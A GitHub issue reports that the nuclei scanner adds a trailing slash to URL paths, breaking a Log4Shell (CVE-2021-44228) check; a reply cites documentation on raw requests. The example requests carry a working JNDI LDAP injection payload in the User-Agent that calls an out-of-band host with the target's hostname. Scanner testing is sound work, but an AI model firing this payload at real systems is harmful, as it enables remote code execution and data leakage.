Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

The latest version will add "/" to the urlpath. #4921

Closed
j4vaovo opened this issue Mar 19, 2024 · 1 comment · Fixed by #4955
Closed

The latest version will add "/" to the urlpath. #4921

j4vaovo opened this issue Mar 19, 2024 · 1 comment · Fixed by #4955
Assignees
@dogancanbakir
Labels
Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.

Comments

@j4vaovo
Copy link

j4vaovo commented Mar 19, 2024
edited

For example, I want to check if a url has a header log4j2
nuclei automatically adds '/' to the urlpath, which causes the check to fail.


nuclei -id CVE-2021-44228 -u http://testphp.vulnweb.com/index.php

GET /index.php/ HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: ${jndi:ldap://${:-350}${:-321}.${hostName}.useragent.cnsug455p36ke354ca4gethghebzmetsw.oast.fun}

Expected behavior


GET /index.php HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: ${jndi:ldap://${:-350}${:-321}.${hostName}.useragent.cnsug455p36ke354ca4gethghebzmetsw.oast.fun}
@j4vaovo j4vaovo added the Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors. label Mar 19, 2024
@dogancanbakir dogancanbakir self-assigned this Mar 20, 2024
@dogancanbakir dogancanbakir mentioned this issue Mar 28, 2024
Merged
4 tasks
@derekkddj derekkddj mentioned this issue Apr 3, 2024
Open
@derekkddj
Copy link

acording to nuclei documentation, If you dont want to add a final slash the nuclei template should not have the / in "raw" requests.
https://docs.projectdiscovery.io/templates/protocols/http/raw-http

To make a request to the URL specified as input without any additional tampering, a blank Request URI can be used as specified below which will make the request to user specified input.

    - raw:
      - |
        GET HTTP/1.1
        Host: {{Hostname}}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@dogancanbakir dogancanbakir

Labels
Type: Bug Inconsistencies or issues which will cause an issue or problem for users or implementors.
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

fix raw req single slash issue projectdiscovery/nuclei
3 participants
@derekkddj @dogancanbakir @j4vaovo